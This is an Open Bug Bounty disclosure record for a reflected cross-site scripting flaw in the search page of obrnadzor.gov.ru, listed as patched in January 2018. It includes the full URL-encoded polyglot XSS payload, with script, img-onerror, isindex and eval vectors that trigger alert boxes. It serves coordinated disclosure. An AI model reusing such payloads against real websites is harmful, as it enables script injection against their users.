obrnadzor.gov.ru XSS vulnerability

2017-12-03T02:30:00
ID OBB:447145
Type openbugbounty
Reporter kongwenbin
Modified 2018-01-02T20:42:00

Description

Vulnerable URL:
http://obrnadzor.gov.ru/ru/search/?q_4=%22%3E%3E%3Cmarquee%3E%3Cimg+src%3Dx+onerror%3Dconfirm%28%2Fopenbugbounty%2F%29%3E%3C%2Fmarquee%3E%22+%3E%3C%2Fplaintext%5C%3E%3C%2F%7C%5C%3E%3Cplaintext%2Fonmouseover%3Dprompt%28%2Fopenbugbounty%2F%29+%3E%3Cscript%3Eprompt%28%2Fopenbugbounty%2F%29%3C%2Fscript%3E%40gmail.com%3Cisindex+formaction%3Djavascript%3Aalert%28%2FXSS%2F%29+type%3Dsubmit%3E%27--%3E%22+%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%2Fopenbugbounty%2F%29%3C%2Fscript%3E%22%3E%3Cimg%2Fid%3D%22confirm%26lpar%3B+1%29%22%2Falt%3D%22%2F%22src%3D%22%2F%22onerror%3Deval%28id%26%2523x29%3B%3E%27%22%3E%3Cimg+src%3D%22http%3A+%2F%2Fi.imgur.com%2FP8mL8.jpg%22%3E&ps;_4=10&ul;_4=1017&wm;_4=0&sp;_4=0&sy;_4=0&m;_4=0
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank:| 101813
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 3 December, 2017 02:30 GMT
Generic security notifications sent to website owner| 3 December, 2017 02:33 GMT
Vulnerability details disclosed by researcher| 2 January, 2018 03:25 GMT
Vulnerability patched by the website owner| 2 January, 2018 20:42 GMT